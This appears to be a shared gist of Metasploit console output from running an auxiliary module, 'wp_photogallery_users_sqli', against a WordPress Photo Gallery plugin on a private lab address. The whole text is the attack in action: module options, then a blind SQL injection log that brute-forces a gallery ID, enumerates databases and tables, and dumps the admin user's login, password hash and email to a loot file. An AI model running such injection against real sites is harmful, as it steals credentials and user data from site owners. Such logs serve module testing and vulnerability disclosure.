gistfile1.txt

Module options (auxiliary/gather/wp_photogallery_users_sqli):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   GALLERYID                   no        Gallery ID to use. If not provided, the module will attempt to bruteforce one.
   Proxies                     no        Use a proxy chain
   RHOST      172.31.16.30     yes       The target address
   RPORT      80               yes       The target port
   TARGETURI  /wordpress       yes       Relative URI of Wordpress installation
   VHOST                       no        HTTP server virtual host

msf auxiliary(wp_photogallery_users_sqli) > run

[*] No GALLERYID supplied, attempting bruteforce.
[*] Found a gallery with an ID of 1
[*] Looks like there are 4 databases.
[*] Schema 0's name has a length of 18. Getting name.
[*] Found database information_schema
[*] Schema 1's name has a length of 5. Getting name.
[*] Found database mysql
[*] Schema 2's name has a length of 18. Getting name.
[*] Found database performance_schema
[*] Schema 3's name has a length of 9. Getting name.
[*] Found database wordpress
[*] Schema wordpress has 21 tables. Enumerating.
[*] Table 0's name has a length of 12
[*] Found table wp_bwg_album
[*] Table 1's name has a length of 20
[*] Found table wp_bwg_album_gallery
[*] Table 2's name has a length of 14
[*] Found table wp_bwg_gallery
[*] Table 3's name has a length of 12
[*] Found table wp_bwg_image
[*] Table 4's name has a length of 20
[*] Found table wp_bwg_image_comment
[*] Table 5's name has a length of 17
[*] Found table wp_bwg_image_rate
[*] Table 6's name has a length of 16
[*] Found table wp_bwg_image_tag
[*] Table 7's name has a length of 13
[*] Found table wp_bwg_option
[*] Table 8's name has a length of 16
[*] Found table wp_bwg_shortcode
[*] Table 9's name has a length of 12
[*] Found table wp_bwg_theme
[*] Table 10's name has a length of 14
[*] Found table wp_commentmeta
[*] Table 11's name has a length of 11
[*] Found table wp_comments
[*] Table 12's name has a length of 8
[*] Found table wp_links
[*] Table 13's name has a length of 10
[*] Found table wp_options
[*] Table 14's name has a length of 11
[*] Found table wp_postmeta
[*] Table 15's name has a length of 8
[*] Found table wp_posts
[*] Table 16's name has a length of 21
[*] Found table wp_term_relationships
[*] Table 17's name has a length of 16
[*] Found table wp_term_taxonomy
[*] Table 18's name has a length of 8
[*] Found table wp_terms
[*] Table 19's name has a length of 11
[*] Found table wp_usermeta
[*] Table 20's name has a length of 8
[*] Found table wp_users
[*] Found 1 possible user tables. Enumerating users.
[*] Table wp_users has 1 rows.
[*] Column ID of row 0 has a length of 1
[*] Found value 1 for column ID, row 0
[*] Column user_url of row 0 has a length of 0
[*] Found value  for column user_url, row 0
[*] Column user_pass of row 0 has a length of 34
[*] Found value $P$BESKOZoFLfOMuIigKqrfHmw44A4zz5. for column user_pass, row 0
[*] Column user_login of row 0 has a length of 5
[*] Found value admin for column user_login, row 0
[*] Column user_email of row 0 has a length of 23
[*] Found value hfjdsajk@fdhjksfdsa.com for column user_email, row 0
[*] Column user_status of row 0 has a length of 1
[*] Found value 0 for column user_status, row 0
[*] Column display_name of row 0 has a length of 5
[*] Found value admin for column display_name, row 0
[*] Column user_nicename of row 0 has a length of 5
[*] Found value admin for column user_nicename, row 0
[*] Column user_registered of row 0 has a length of 19
[*] Found value 2015-01-1214:44:12 for column user_registered, row 0
[*] Column user_activation_key of row 0 has a length of 0
[*] Found value  for column user_activation_key, row 0
[+] Users stored in JSON file /home/bperry/.msf4/loot/20150112094250_default_172.31.16.30_wordpress.file_147953.bin
[*] Auxiliary module execution completed
msf auxiliary(wp_photogallery_users_sqli) >